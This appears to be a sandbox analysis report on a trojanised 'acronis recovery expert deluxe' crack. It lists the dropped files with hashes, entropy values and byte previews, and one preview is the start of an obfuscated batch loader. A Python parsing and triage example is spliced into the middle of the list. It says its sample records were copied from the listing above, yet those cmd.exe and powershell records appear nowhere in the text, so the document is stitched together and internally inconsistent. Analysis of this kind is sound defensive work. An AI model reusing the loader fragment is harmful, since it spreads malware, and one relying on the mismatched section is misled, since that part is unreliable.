                                                                                                                                                                                                                                        Preview:..6...3.'X...Q]..9.X].....z..`...rE^..XZ.Xw........$.......p.(....u..S.D...wS.v5...R.obfe.5.qo;..X..).........pJz.../..Pc....f.G...V....d0..S....h'X9...vw.....6.zs...?.$.,I..8......./6.._.......KE....p........S.~.&....5z......}.._.nK`h....[H........!.....B..E...s.....T3..<4.r...<.`...q.......G?u...O.5...6.W....o...1...o..v.|..F.A.7l.`..JO....N....J.R@.*.......a...|....&.X%.!.k.W.K...\e....'.."...)P...Uzx...0...........q.%.....^.<u....e.n]T..5.!0P..{5-.....FM....D2...8.....nWq.^.hJ.Bs^4..X..f.z.(}.au.*..e6.5 v.?nb.I.y39.1}..-(-..3s....n..b...qKqo...=[..nQU......g.an.s..gu..wE...z..74.w.ed.#P./Y...u....N:B....!...[...".....D.K...d.U.".....J.b'......].*.....7.....+......7(.........u....Y.1.........$..D.3E.Z...)}MG..<.p.BP........?.NS.8........1c...R$.u.....}..<."z../...|WL3.L%d.-...O....c..a....,..Z.Y.X.o....m..P..d...D.r0v.%ACe...W.....:........6...I...%.r.dpW....5$..Z....am.$..~...J..U~Q|.l..(....Kk..)....].......C?-.e!...UaV.B...
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):53248
                                                                                                                                                                                                                                        Entropy (8bit):5.5737899996482545
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:eVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08Qb:+q8QLeAg0Fuz08a
                                                                                                                                                                                                                                        MD5:F71A6B8DE5E35D265DF820D0FB5344DD
                                                                                                                                                                                                                                        SHA1:209BCDCFD5023C7263A8D4AA879D56DE1ED6791C
                                                                                                                                                                                                                                        SHA-256:C1A62EFA509B011E4473E9533E0F99DED16601FA7C222AFD8104BBC7759A1C6B
                                                                                                                                                                                                                                        SHA-512:2B10CD9C08F02A25508AAB9A8BF8556062DF2473569062DDFD4AC573806BC781B0F086BD83829B477DB277DF2AC2B177BB3538C1BDFB89A5F0BD930F0D1D1D83
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.B.K.C.O.L.O.R.....I.N.I.R.E.A.D.S.E.C.T.I.O.N.N.A.M.E.S...G.U.I.C.T.R.L.C.R.E.A.T.E.B.U.T.T.O.N...D.L.L.C.A.L.L.B.A.C.K.R.E.G.I.S.T.E.R...G.U.I.C.T.R.L.C.R.E.A.T.E.U.P.D.O.W.N...G.U.I.C.T.R.L.C.R.E.A.T.E.S.L.I.D.E.R...S.T.R.I.N.G.R.E.G.E.X.P.R.E.P.L.A.C.E...O.B.J.C.R.E.A.T.E.I.N.T.E.R.F.A.C.E.....G.U.I.C.T.R.L.S.E.N.D.T.O.D.U.M.M.Y.....F.I.L.E.C.R.E.A.T.E.S.H.O.R.T.C.U.T.....G.U.I.C.T.R.L.C.R.E.A.T.E.I.N.P.U.T.....S.O.U.N.D.S.E.T.W.A.V.E.V.O.L.U.M.E.....F.I.L.E.C.R.E.A.T.E.N.T.F.S.L.I.N.K.....G.U.I.S.E.T.A.C.C.E.L.E.R.A.T.O.R.S.....G.U.I.C.T.R.L.C.R.E.A.T.E.C.O.M.B.O.....G.U.I.C.T.R.L.S.E.T.D.E.F.C.O.L.O.R.....P.R.O.C.E.S.S.S.E.T.P.R.I.O.R.I.T.Y.....G.U.I.C.T.R.L.S.E.T.R.E.S.I.Z.I.N.G.....S.T.R.I.N.G.T.O.A.S.C.I.I.A.R.R.A.Y.....D.R.I.V.E.G.E.T.F.I.L.E.S.Y.S.T.E.M.....G.U.I.C.T.R.L.C.R.E.A.T.E.D.U.M.M.Y.....T.R.A.Y.I.T.E.M.S.E.T.O.N.E.V.E.N.T.....G.U.I.C.T.R.L.C.R.E.A.T.E.R.A.D.I.O.....W.I.N.M.I.N.I.M.I.Z.E.A.L.L.U.N.D.O.....G.U.I.C.T.R.L.C.R.E.A.T.E.G.R.O.U.P.....G.U.I.C.T.R.L.C.R.E.A
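The dropped-file records above are a flat run of key:value lines (Process, File Type, Size, Entropy (8bit), Encrypted, hashes, Malicious) with no separator between files, which is awkward to feed into an IOC pipeline by hand. The following Python is an added worked example, not Joe Sandbox's own code, that parses records in that layout, reproduces the report's hash and 8-bit entropy columns for a local copy of a file, and applies a simple triage rule. Two assumptions are labelled in the code: that a new record begins at every `Process:` line (as the visible layout suggests), and that the 7.9 bits/byte cut-off used to mirror the `Encrypted:true` flag is this example's choice, since the page does not state the sandbox's actual threshold. The sample input is two records copied from the listing above (the PE32 file written by cmd.exe and the zip written by powershell.exe).

```python
import hashlib
import math
from collections import Counter

# Constructed sample input: two records copied from the report's dropped-file
# listing above (values are the report's own; the "Preview" lines are omitted).
SAMPLE_RECORDS = """\
Process:C:\\Windows\\SysWOW64\\cmd.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):947288
Entropy (8bit):6.630612696399572
Encrypted:false
MD5:62D09F076E6E0240548C2F837536A46A
SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Malicious:true
Process:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
Category:dropped
Size (bytes):18817091
Entropy (8bit):7.998043677768579
Encrypted:true
MD5:B3923A3753F6CFB886CB3C0EB9A482EB
SHA1:4E32830B43642D0E16A0DB0FDC22C22054A5A798
SHA-256:F8E2E5B144310C92D009450BD3EE03EBF61AF48C51829A0CAC102A078517E7AE
Malicious:false
"""


def parse_records(text):
    """Split the flat key:value listing into one dict per dropped file.
    Assumption: every 'Process:' line opens a new record (matches the layout
    of the report, which prints no separator between files)."""
    records, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key == "Process":
            cur = {}
            records.append(cur)
        if cur is not None:
            cur[key] = value.strip()
    return records


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the measure the report labels
    'Entropy (8bit)': 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def hashes_of(data: bytes) -> dict:
    """Reproduce the report's hash columns for a local copy of a dropped file,
    upper-cased to match the report's formatting."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def looks_packed_or_encrypted(entropy: float, threshold: float = 7.9) -> bool:
    """Assumed heuristic: near-maximal entropy means compressed or encrypted
    content. The 7.9 cut-off is this example's choice, not a documented
    sandbox rule; it reproduces Encrypted:true for the 7.998-entropy zip."""
    return entropy >= threshold


def triage(records):
    """Reduce each record to the fields an analyst pivots on: hash, which
    process wrote the file, whether it is a PE, and the two risk flags."""
    out = []
    for r in records:
        ent = float(r.get("Entropy (8bit)", "0"))
        out.append({
            "sha256": r.get("SHA-256", "").lower(),
            "dropped_by": r.get("Process", "").rsplit("\\", 1)[-1].lower(),
            "is_pe": r.get("File Type", "").startswith("PE32"),
            "high_entropy": looks_packed_or_encrypted(ent),
            "malicious": r.get("Malicious") == "true",
        })
    return out


def pe_written_by_interpreter(triaged):
    """Highlight PE files written by shell/script hosts (cmd.exe, powershell.exe),
    the pattern behind the report's 'Powershell drops PE file' signature."""
    hosts = {"cmd.exe", "powershell.exe"}
    return [t["sha256"] for t in triaged if t["is_pe"] and t["dropped_by"] in hosts]


if __name__ == "__main__":
    rows = triage(parse_records(SAMPLE_RECORDS))
    for row in rows:
        print(row)
    print("PE written by interpreter:", pe_written_by_interpreter(rows))
```

Note that the entropy column alone does not separate benign from hostile content: the 7.998-entropy zip is flagged `Encrypted:true` but `Malicious:false`, while the 6.63-entropy PE is the one marked malicious, so the flags are pivots for further analysis rather than a verdict.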
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2792
                                                                                                                                                                                                                                        Entropy (8bit):5.460118362302476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:i9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+MAyKnFHi:ySEA5O5W+MfH5S1CqlVJcI6mli
                                                                                                                                                                                                                                        MD5:DC6DCA71DC33501438D2C65C5F1C53A6
                                                                                                                                                                                                                                        SHA1:7A8158725676B303FD95694A1DF5E1C691CFB8DD
                                                                                                                                                                                                                                        SHA-256:90B33984857F95C59E3047C7B94CEB5F2F9898BE446BB12941EF9C646532F349
                                                                                                                                                                                                                                        SHA-512:DE13200D1E804E2E6658A7947549F1A62A966273E99682306735313B9FA6D4FBCC66EB785E581952FEA5FB38AA04706C921686EF214F7FE3B56471661778CF92
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:GERMANY........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):80896
                                                                                                                                                                                                                                        Entropy (8bit):7.997548876997834
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:hTRnjxMaHcO00CECYYAMRobjKgJKslK2PeIUD8EM6619k38GZBIc2A2C:hdjxx9PYA8ovKgUslKzfSDzT+/h
                                                                                                                                                                                                                                        MD5:F997AAAD93BAC3365407710C482548D0
                                                                                                                                                                                                                                        SHA1:4FECD0DE9DE798A1698B86270240E8C697228386
                                                                                                                                                                                                                                        SHA-256:C6A7EB882C69AC388BBF30F2F1050F1BC8C1F5D677C410254ECB43B96BBE0878
                                                                                                                                                                                                                                        SHA-512:38742124AF5D43E665A852F61FE5A462469CC7492487B8F88445664B13CCFCA0550470DFA23ECA233546179F7D30D2C2C533B07DA1D69F75CFD7E399C58CB1BD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.....]&.l.-Q.G.......{..}..7ra*1...c......+)...#..*..V...@..J.W.YlXv...d@.P?97K....A1.>...2.t.....5..Q..T..a.2xoDR.b*}h..=..?..Y.h..2.{og.G.f..K..d...ZN.K..Dt...$..v..k..Eb.......b.....o.7...Q.Y.9p...../r.DE?..q....x.C@..#..?..K.......pv.iv7...n...C.........&D...7....SJK...bvW.n..0.d....S..@Nb../..........nh7..4^....W.p.....Bv...R..Vhn....8.....M.v. ....1.F.Z...kR....p......C.nT=Y..'$B...mK!(.D.......4....."k+.eQ...+..H=...5v..23..h_YG..Nu\e0C..r......w/.^).^...D...m.4....T.#i......"o6.I..B.5..^imldQP.....>....w..q..R1...@.:......\d1,nc...%.E........}..+...U..c..H<...(rG.Cd.J.F..I.FF.2.....=...?..9..]e...%A.3("Z...T......Unb...e.........r#h.RI.{p.-;...?.O/'...;..S.N.h'g..f.1.../......$=q.I...Lf..3.5..c.:....V_.?+*C./.%.q.Y...!.N..@m....:.Y..".5.jA......i..{.TDU.5....s...r.LI.R.>.;._....n*j].)....SM..ny>3.|..R^C.&.'..)....?..M.....'...V....\....2.Vb...Q..g[&......{..2M...U..F.._...Bc....v...$..Bz.>ZoDWh..<..T0.....LU..4..!`..rG'.../.
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                        Entropy (8bit):7.997023843324058
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:cB4SI2Np9uP60eWPV3nOKXCNDVGsEhiR3GeEjcZg:cB4I9gOfhGsEwRhK
                                                                                                                                                                                                                                        MD5:030E6B7BDC54511621DDC51FE1D3070B
                                                                                                                                                                                                                                        SHA1:ACBCB368A81C3FD446D64BEE1B7D8BD4C3724BCF
                                                                                                                                                                                                                                        SHA-256:B7CA4DB3EF2AEA9BC3588331BA7DDEB0DA874F67175D039C71B1C37DF12CBAA2
                                                                                                                                                                                                                                        SHA-512:817A5C0B45B42438F1626A1D841F144CB58AAD2272F914660FCD1FB379931CE4E9A6791E359A08E4D1807E289147639644D2D1704B799E8B3A445EE4CFBC73A4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.if.%m..|..l...X...u?....P.@.>'...KX..R.L..z....k..u...&..).T.d..a..\l+..d4o6.].. Z..3:..[K....U....8.=y....H:....8.....v...A."K......-Xe......zx..}.k...r.1..p.._N.xl..;.......YJ......&.*9A.[..Q...... c]#..PT..9...G.DE...`j.&.R..b..9.....J..%ly`...|..*..L ..q)9.Y....n...b..\.&...:.P....&..-....n .i_k8....rD.0.K:e....W..X..<B.&..x^..i..... _%y@L1D(...4.b..:.....b.......n...?)... u..G..@2Dvj.=.E._.)..g.$.;........_.}5}.:.Ga...B"...J+D.PJ....e....:......u^.wu.L.......UKPO^...c.I9.P...p....9.....*..<..;..!<.dt.....q`..`<..1}.f;BR.)...:.....es.....xT...........C.M......nb.xbk......T.0......._X...t0.m-2. z.(.._..~..)4....f^m'........?....ef..._.t........PE......:...u.N.\...!..C...f......H.N.W... Z~|.0@z... }.v...H...G..X....!.,[c.G...O`5...9~5....Z.d89...3B:..<....z......d..FzN....[..T...ZBv.......PO..c.y?...I.hUUH...'O~..h%.C..v..Q"%.g.B<(...8..F/y.^p...!....M...............#I.....3..Bv.......8....gam.T...w#...\k...w....Xt.A....."..d..&
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):113664
                                                                                                                                                                                                                                        Entropy (8bit):5.3694203589687115
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Baj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmdA8:Q6whxjgarB/5elDWy4ZNoGmr
                                                                                                                                                                                                                                        MD5:4995F791E86BE37567C50323B0B3D98B
                                                                                                                                                                                                                                        SHA1:DC17AD984ECB982CDDAA79592FFF79363A46B45F
                                                                                                                                                                                                                                        SHA-256:71D01D67E707498F1090A296C554F63901FB4F0C9A5846335DE67F47B091D7E3
                                                                                                                                                                                                                                        SHA-512:EA99B97CFA615B57F1F6CAD67636A887D04B720E5EF3A21E28434676457845E6907478321CF6B06CE6637A9A0FFE7C104BB629C70638AC9F488861C3110BBDBE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.......................................................................................................................................................\.p.{.L.u.}.....\.P.{.L.u.}.............................................................................................................................................................................................................................................................................\.P.{.X.a.n.}...no error.\ at end of pattern.\c at end of pattern.unrecognized character follows \.numbers out of order in {} quantifier.number too big in {} quantifier.missing terminating ] for character class.invalid escape sequence in character class.range out of order in character class.nothing to repeat.internal error: invalid forward reference offset.internal error: unexpected repeat.unrecognized character after (? or (?-.POSIX named classes are supported only within a class.missing ).reference to non-existent subpattern.erroffset passed as
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1247), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26936
                                                                                                                                                                                                                                        Entropy (8bit):5.10701699479355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:3mL5/kYydE83/1cQEEyG4wJH0YR4zuZAUgJFk4a:ikn3tcNEj4wJHTylfk4a
                                                                                                                                                                                                                                        MD5:E93B09D6C9F09D9E3D7EA2B3E08C1688
                                                                                                                                                                                                                                        SHA1:4BB379C69728D45BC2CB8C762A7134186EFD0F37
                                                                                                                                                                                                                                        SHA-256:8742A9865A67762D52402C5489930CE2C5C31580BA2DAF76C23FC9007738F549
                                                                                                                                                                                                                                        SHA-512:2636B6A95BA082B1C55BD9E35B29963EB1D4FF2D1530F76A333FE6EF09301CBDFBABADB5CB4D25DB034357C53CA8C3E85BDA9EEC28BEDFF99309C9FA8628A257
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:Set Co=X..VrgFFill-Linking-Beautiful-Quick-Ver-..MEICrew-Requires-Sw-Topics-Knights-..bfxBuck-Blow-Brief-..HhdCollaboration-Thoughts-Tribune-Aaa-Topics-Vienna-Approximate-Alan-Locale-..vfIng-Move-Rec-Spray-Oasis-Peripheral-In-..obThis-Dv-Greensboro-Den-Handles-Rebel-Av-Potato-..QcNeck-Creek-Sprint-Transition-Subsequently-Ion-Armenia-..SyPirates-Lisa-Given-Licensing-Amsterdam-Objective-..IqviOrg-..Set Ip=O..kNIkButt-Dresses-Dear-..pIVRBlair-Notebooks-Your-Whats-Origins-Spatial-Theorem-..SPVenice-..UHMonetary-Saver-Genome-Accidents-Lindsay-..RTFounded-Infants-Blind-..SasWithdrawal-..GcxyAlive-Attitudes-Throat-Suspended-Controls-Ear-Segments-Gamecube-..nFTSpecifies-Copyrights-Agreements-Rocket-Calvin-..Set Mississippi=s..vHCatering-Sunday-Ala-Nebraska-Gibson-Questions-Become-Fans-..xbiProductivity-Developing-Host-Domain-..OajProprietary-Fusion-Transportation-Filed-Realtor-Aquatic-Duplicate-Olympics-Line-..XAFkAtlantic-..vUpGravity-F-Diana-Subsidiary-Vocational-..NgPaying-Edited-Password-C
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1247), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26936
                                                                                                                                                                                                                                        Entropy (8bit):5.10701699479355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:3mL5/kYydE83/1cQEEyG4wJH0YR4zuZAUgJFk4a:ikn3tcNEj4wJHTylfk4a
                                                                                                                                                                                                                                        MD5:E93B09D6C9F09D9E3D7EA2B3E08C1688
                                                                                                                                                                                                                                        SHA1:4BB379C69728D45BC2CB8C762A7134186EFD0F37
                                                                                                                                                                                                                                        SHA-256:8742A9865A67762D52402C5489930CE2C5C31580BA2DAF76C23FC9007738F549
                                                                                                                                                                                                                                        SHA-512:2636B6A95BA082B1C55BD9E35B29963EB1D4FF2D1530F76A333FE6EF09301CBDFBABADB5CB4D25DB034357C53CA8C3E85BDA9EEC28BEDFF99309C9FA8628A257
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:Set Co=X..VrgFFill-Linking-Beautiful-Quick-Ver-..MEICrew-Requires-Sw-Topics-Knights-..bfxBuck-Blow-Brief-..HhdCollaboration-Thoughts-Tribune-Aaa-Topics-Vienna-Approximate-Alan-Locale-..vfIng-Move-Rec-Spray-Oasis-Peripheral-In-..obThis-Dv-Greensboro-Den-Handles-Rebel-Av-Potato-..QcNeck-Creek-Sprint-Transition-Subsequently-Ion-Armenia-..SyPirates-Lisa-Given-Licensing-Amsterdam-Objective-..IqviOrg-..Set Ip=O..kNIkButt-Dresses-Dear-..pIVRBlair-Notebooks-Your-Whats-Origins-Spatial-Theorem-..SPVenice-..UHMonetary-Saver-Genome-Accidents-Lindsay-..RTFounded-Infants-Blind-..SasWithdrawal-..GcxyAlive-Attitudes-Throat-Suspended-Controls-Ear-Segments-Gamecube-..nFTSpecifies-Copyrights-Agreements-Rocket-Calvin-..Set Mississippi=s..vHCatering-Sunday-Ala-Nebraska-Gibson-Questions-Become-Fans-..xbiProductivity-Developing-Host-Domain-..OajProprietary-Fusion-Transportation-Filed-Realtor-Aquatic-Duplicate-Olympics-Line-..XAFkAtlantic-..vUpGravity-F-Diana-Subsidiary-Vocational-..NgPaying-Edited-Password-C
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):83968
                                                                                                                                                                                                                                        Entropy (8bit):7.997823110523501
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:+p0HZZ27AnG3PugJuJ31yHTyYbs+aAlPiVOTp72OTz+U301vcOyG:+O2oGfug4kOcnlTTzt30R
                                                                                                                                                                                                                                        MD5:70BBC8130EE71A5FF4D48D5A932BF6FC
                                                                                                                                                                                                                                        SHA1:2B2D259558F4FB767ECEBCFCD525C850A46519AF
                                                                                                                                                                                                                                        SHA-256:3ED2CECD3B363CAF278CFCCAC739203BAFF8ED6741FEF81AB4D6515654C8221D
                                                                                                                                                                                                                                        SHA-512:C91D63E83F3E7C859A799C8EBEB419E573E37C4371535A3952DD32C7D5765165127EA2C6F069BAA9E28A44D9D6E41BAAD37A12513AAA45366DBCF48C9EF46731
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.e-...y.m?>.b.1.2.M..@....,'{Qk.........3.'...Y..hl..&c....-.+8: .OI.G.$.(G.:.........%....y............7Hi2Nt@6I.Lg.[......H.8h@.VK.r....D.N.p'..f..z.....N...`2.........h.x...q.r.<.6..J~.j....2.~!....sH.$.....d..`...zK...k,C.R..d9.....U.g.7..........H.x(...G*.._..b..&|.u.X.$.....u...N.{+..g....k.n.2....Bzro.......w.j._:..Z...\..z<...GH.z.5.Z0..o.]e.{..".=.9.hr....O.._.d.......e.N..mw......"...cY.......8m..O....Mo.......^.K...PB.'f...,..=GN..Q.....`s4Z.\....f?.....!...4.p.Y...<=a.......0.y`.]f.....fM..E..L.S....$.[...y..y.:..$..H.xMB..d.......+w.^.[y.+...1.mS.VL..........|.Ses0..I,.=.p..`.q.....9a..~.+.T@..c.8.I.]=..z....i~.s._.5.R/\33.B....F..y..u.t...1..J....,D.#F.p.u..L.N3.......K.7..r6..dF.(6./.....M.?t-W...H...5.q...`..{...9.2.oe...+..n..n\..>.K..ZS._.......\...R.S.I.|#.'F<.ef.....6.... l.^.....E...vv...W?...[.Q....7....z.H.=Y132m|...hT..zVT..N..].~...1...u.wa...}Ip'.%...)...(..........(.m/..`{<.ET.1..s..7.Y....v.
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75776
                                                                                                                                                                                                                                        Entropy (8bit):7.997292934091786
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:fhBOY4jjgGW0ZC+z7DRKHVsWA21a8kCjjlRycd3jYO94u:fnOYeC0ZC07DAHV021a8tl8cd3Z4u
                                                                                                                                                                                                                                        MD5:781C193F00D297CD53A1EB59C9CDF70E
                                                                                                                                                                                                                                        SHA1:B64BEE781F783C1E89FDC9039EF26FB855EE0066
                                                                                                                                                                                                                                        SHA-256:03A54FA62214648FDC63126C05934292DA4E701C3F2E35464B072CD8C2387F66
                                                                                                                                                                                                                                        SHA-512:E93E53653AF189115C8FD8E76CD3C72FD167468DCE585FCA58369458038BE9AC38A2F96E56CBCEB7BF5A26D89A59AAF7694DE77A0B4D27E6EE3E83228B625D06
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):148480
                                                                                                                                                                                                                                        Entropy (8bit):6.679488307607274
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:PF4qv+32eOyKODOSpQSAU4CE0Imbi80PtCZEMnVIPPBxo:dBmmLsiS+SAhClbfSCOMVIPPg
                                                                                                                                                                                                                                        MD5:705C2448A0B9D068E72379DD16CCDD73
                                                                                                                                                                                                                                        SHA1:70EB0F1C607851405D21E7CFAA79D06D5700E425
                                                                                                                                                                                                                                        SHA-256:5CA53955C5C6A30CC8F9524A4F7039D474EE07C337D20849CF0705D476430F44
                                                                                                                                                                                                                                        SHA-512:7D2D322FB64D7A7365869A02D0CE3347C31A033FF523022EEC2BD853134103BBE5D6CD946CD7B8BC1AB90C7B4E7C93C9AAB47BF2C46D3F1EA8DFBC524E2329AB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2624
                                                                                                                                                                                                                                        Entropy (8bit):7.924560140167433
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:J5vu2jenhkm+v3+/8CVlxKPZBHEOHTccP4JgzpWA37wUrDKPAGS07Q:J5vu2kkm+v3+/hDxKBBHE2ThPsU1rZ
                                                                                                                                                                                                                                        MD5:13948D21219B28F303F621DBAEC48120
                                                                                                                                                                                                                                        SHA1:0ED13940BA622FF24AC205303D5D5F80F28205AD
                                                                                                                                                                                                                                        SHA-256:F869A6AC60DA57200D8948D54146A5D51C095BAEC3BFE91252643AEAED059520
                                                                                                                                                                                                                                        SHA-512:D05956FEAEC0185F93B5FCC12F35B7068C80562A46AB88421365CFC56786A157104002EC18EF8D0D507092EF35A3BB906DE19868A689CCEF836941C1FD8D103A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):104448
                                                                                                                                                                                                                                        Entropy (8bit):5.466669665581871
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:+7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/SG:SklMBNIimuzaAwusPd
                                                                                                                                                                                                                                        MD5:AB180A93C7B9A2250BAE36E890768D8C
                                                                                                                                                                                                                                        SHA1:545B35567FDDE09CED64794EF02DC71CF54AED0F
                                                                                                                                                                                                                                        SHA-256:2165EA159F34A517996F3428BBC713F71DE715487059B176AD660C9DB5F19AB4
                                                                                                                                                                                                                                        SHA-512:405F9330EC33AF461A956C3F0FAAD349C0DBB64EB9233894F9442B3518A6525507034866D7E0D094C4A12998508CA3FAACF8494AFEE38234C88FBCF55A2E2C0C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):62464
                                                                                                                                                                                                                                        Entropy (8bit):6.690253969108149
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:lvyNf7Xw2U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+GC:laW2UDQWf05mjccBiqXvpC
                                                                                                                                                                                                                                        MD5:B9E28F7D26CC55A2697AB3672CF8B427
                                                                                                                                                                                                                                        SHA1:6D8BF6F962030BF2383AE7C95F339242AB628FC8
                                                                                                                                                                                                                                        SHA-256:B1FFC6A25321FB50B1B38A4137AB5EE00A480B74B64A72427D64AC3CC4A455C7
                                                                                                                                                                                                                                        SHA-512:D20035A4744011379DFEC4DA3C20FDD9AB40053FFA1D0D8F9357626E9892B940E11CB3CB38D282B7730C992A937FD55D8D6C06C7853799E4C9CF7046DBA26CDC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):101376
                                                                                                                                                                                                                                        Entropy (8bit):6.249290243941694
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Kg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3n:d5vPeDkjGgQaE/n
                                                                                                                                                                                                                                        MD5:34C1BB59F1E59F491E1F9913C906D5ED
                                                                                                                                                                                                                                        SHA1:A17AADA9CF6378B2927FE665B01C1231E655DE93
